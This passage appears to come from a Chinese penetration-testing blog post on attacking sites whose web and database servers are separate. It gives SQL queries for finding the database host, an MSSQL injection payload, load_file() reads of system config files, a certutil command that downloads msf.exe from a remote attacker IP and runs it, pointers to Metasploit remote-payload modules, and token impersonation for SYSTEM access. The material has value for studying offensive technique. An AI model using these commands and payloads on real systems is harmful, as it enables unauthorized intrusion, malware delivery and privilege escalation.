<h4 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h4><h4 id="站库分离"><a href="#站库分离" class="headerlink" title="站库分离"></a>站库分离</h4><h5 id="从web入口"><a href="#从web入口" class="headerlink" title="从web入口"></a>从web入口</h5><p>通过web入口可以通过web漏洞getshell，getshell之后获取数据库配置文件、对数据库内容进行分析，主要找到数据库ip。</p>
<h5 id="从数据库入口渗透"><a href="#从数据库入口渗透" class="headerlink" title="从数据库入口渗透"></a>从数据库入口渗透</h5><p>获取数据库账号、密码</p>
<p>在mysql中可以查看用户正在运行的线程，进而得到数据库ip地址。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from information_schema.processlist</span><br></pre></td></tr></table></figure>

<p>在mssql中是否判断站酷分离</p>
<p>获取客户端主机名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select host_name();</span><br></pre></td></tr></table></figure>

<p>获取服务端主机名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select @@servername;</span><br></pre></td></tr></table></figure>

<p>如果客户端主机名和服务端主机名一直则是同站同数据库，如果不是则是站库分离。</p>
<h5 id="站库分离的判断方法"><a href="#站库分离的判断方法" class="headerlink" title="站库分离的判断方法"></a>站库分离的判断方法</h5><h6 id="查看网络连接状态"><a href="#查看网络连接状态" class="headerlink" title="查看网络连接状态"></a>查看网络连接状态</h6><p>通过Netstat命令查看MSSQL数据库1433端口的网络连接状态，可以看到与当前MSSQL数据库服务器192.168.32.8建立连接的只有192.168.32.3，由此可以判断这台主机为Web服务器，并且站库分离。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano | findstr &quot;1433&quot;</span><br></pre></td></tr></table></figure>

<h6 id="查看当前服务器的IP"><a href="#查看当前服务器的IP" class="headerlink" title="查看当前服务器的IP"></a>查看当前服务器的IP</h6><p>数据库配置文件</p>
<p>通过网站程序数据库配置文件来判断是否站库分离，如果数据库IP地址是localhost、127.0.0.1或当前主机内网IP则说明为同服务器，反之则可能为站库分离。</p>
<p>MySQL内置函数和库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select @@hostname;                                 &#x2F;&#x2F;服务端主机名称</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from information_schema.PROCESSLIST;      &#x2F;&#x2F;客户端主机名称和端口</span><br></pre></td></tr></table></figure>

<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201110222106564.png" alt="image-20201110222106564"></p>
<p>MSSQL注入语句</p>
<p>执行下面语句，如果页面正常回显，说明<code>host_name()=@@servername</code>即数据库服务端主机名称与数据库客户端主机名称一样，说明站库不分离。否则站库分离。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and exists(select * from news where 1&#x3D;(SELECT (case when host_name()&#x3D;@@servername then 1 else 0 end)))</span><br></pre></td></tr></table></figure>

<p>MSSQL内置函数和表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select host_name();                       &#x2F;&#x2F;客户端主机名称</span><br><span class="line">select @@servername;                      &#x2F;&#x2F;服务端主机名称</span><br><span class="line">select serverproperty(&#39;MachineName&#39;);     &#x2F;&#x2F;服务端主机名称</span><br></pre></td></tr></table></figure>

<p>其他配置文件</p>
<p>通过load_file()这个内置函数读取一些敏感文件，hosts文件、IIS/Apache/Nginx/Tomcat/Jboss/Weblogic/Websphere的相关配置文件以及网卡信息等。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">select load_file(&#39;C:&#x2F;Windows&#x2F;System32&#x2F;drivers&#x2F;etc&#x2F;hosts&#39;);</span><br><span class="line">&#x2F;etc&#x2F;hosts</span><br><span class="line">&#x2F;etc&#x2F;apache2&#x2F;apache2.conf</span><br><span class="line">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</span><br><span class="line">&#x2F;etc&#x2F;udev&#x2F;rules.d&#x2F;70-persistent-net.rules          &#x2F;&#x2F;获取网卡名称</span><br><span class="line">&#x2F;etc&#x2F;network&#x2F;interfaces                            &#x2F;&#x2F;DHCP或静态IP</span><br></pre></td></tr></table></figure>

<h5 id="站库分离利用思路"><a href="#站库分离利用思路" class="headerlink" title="站库分离利用思路"></a>站库分离利用思路</h5><p>下载远程木马文件</p>
<p>目标主机允许通外网时我们可以利用Vbs/Ftp/IPC$/Certutil/Bitsadmin/Powershell等方式来下载远程文件到可读写目录中，然后再去执行一下即可。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">certutil -urlcache -split -f http:&#x2F;&#x2F;155.**.***.229:8888&#x2F;msf.exe C:\ProgramData\msf.exe</span><br><span class="line">C:\ProgramData\msf.exe</span><br></pre></td></tr></table></figure>

<p>使用metasploit模块</p>
<p>在数据库服务器中，没有web服务我们无法上传webshell，比如上传php、jsp、aspx等文件到目标服务器，执行webshell进而拿到shell。这时候我们可以使用msf的模块，该模块监听一个端口，但是不是生成一个exe木马，或者是一个编程语言的webshell，而是利用对方主机能够执行命令的特点，来获取一个shell。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Metasploit下的exploit&#x2F;multi&#x2F;script&#x2F;web_delivery和exploit&#x2F;windows&#x2F;misc&#x2F;hta_server两个模块来执行远程Payload获取会话</span><br></pre></td></tr></table></figure>

<p>模拟令牌权限提升</p>
<p>通过Incognito扩展中的模拟令牌功能获取到数据库服务器的Admin/SYSTEM令牌。</p>
<p>通过Windows身份验证，使用数据库连接工具，比如sqlcmd、SSMS和Navicat Premium等。</p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://s1eady.top/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/" title="一个网站的渗透思路" target="_blank" rel="external">http://s1eady.top/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E4%B8%80%E4%B8%AA%E7%BD%91%E7%AB%99%E7%9A%84%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/cofess" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/1.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/cofess" target="_blank"><span class="text-dark">果冻</span><small class="ml-1x">Penetration Testing</small></a></h3>
        <div>一往情深深几许。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2020/10/26/CTF-Crypto%E5%88%B7%E9%A2%981/" title="CTF-Crypto刷题1"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2020/10/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%89%8B%E6%B3%A8%E7%BB%83%E4%B9%A0/" title="渗透测试--SQL注入漏洞手注练习"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="文章目录" role="button">
        <span>[&nbsp;</span><span>文章目录</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>赏</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>感谢您的支持，我会继续努力的!</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/2.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开支付宝扫一扫，即可进行扫码打赏哦</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/1.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开微信扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> 支付宝</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> 微信支付</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="/GXA111666" target="_blank" title="VX" data-toggle=tooltip data-placement=top><i class="icon icon-VX"></i></a></li>
        
        <li><a href="/1252195810" target="_blank" title="QQ" data-toggle=tooltip data-placement=top><i class="icon icon-QQ"></i></a></li>
        
        <li><a href="/1252195810@qq.com" target="_blank" title="E-Mail" data-toggle=tooltip data-placement=top><i class="icon icon-E-mail"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>